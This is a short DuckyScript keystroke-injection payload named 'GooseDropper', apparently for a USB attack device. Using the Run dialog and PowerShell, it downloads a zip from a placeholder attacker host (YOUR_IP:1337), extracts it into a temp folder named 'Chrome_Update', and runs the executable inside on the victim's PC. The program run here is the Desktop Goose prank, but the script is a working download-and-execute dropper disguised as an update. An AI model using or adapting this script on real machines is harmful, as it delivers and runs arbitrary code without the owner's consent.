19 lines
485 B
Plaintext
19 lines
485 B
Plaintext
REM TITLE GooseDropper
|
|
REM AUTHOR Fr3ki
|
|
REM DESCRIPTION Grab the Desktop Goose executable from an attacker machine and run it on the victim PC
|
|
DELAY 500
|
|
GUI r
|
|
DELAY 500
|
|
STRING powershell wget YOUR_IP:1337/update.zip -OutFile $ENV:Temp/Updater.zip
|
|
ENTER
|
|
DELAY 5000
|
|
GUI r
|
|
DELAY 500
|
|
STRING powershell Expand-Archive $ENV:Temp\Updater.zip -DestinationPath $ENV:Temp\Chrome_Update
|
|
ENTER
|
|
DELAY 3000
|
|
GUI r
|
|
DELAY 500
|
|
STRING %Temp%\Chrome_Update\Update\GooseDesktop.exe
|
|
ENTER
|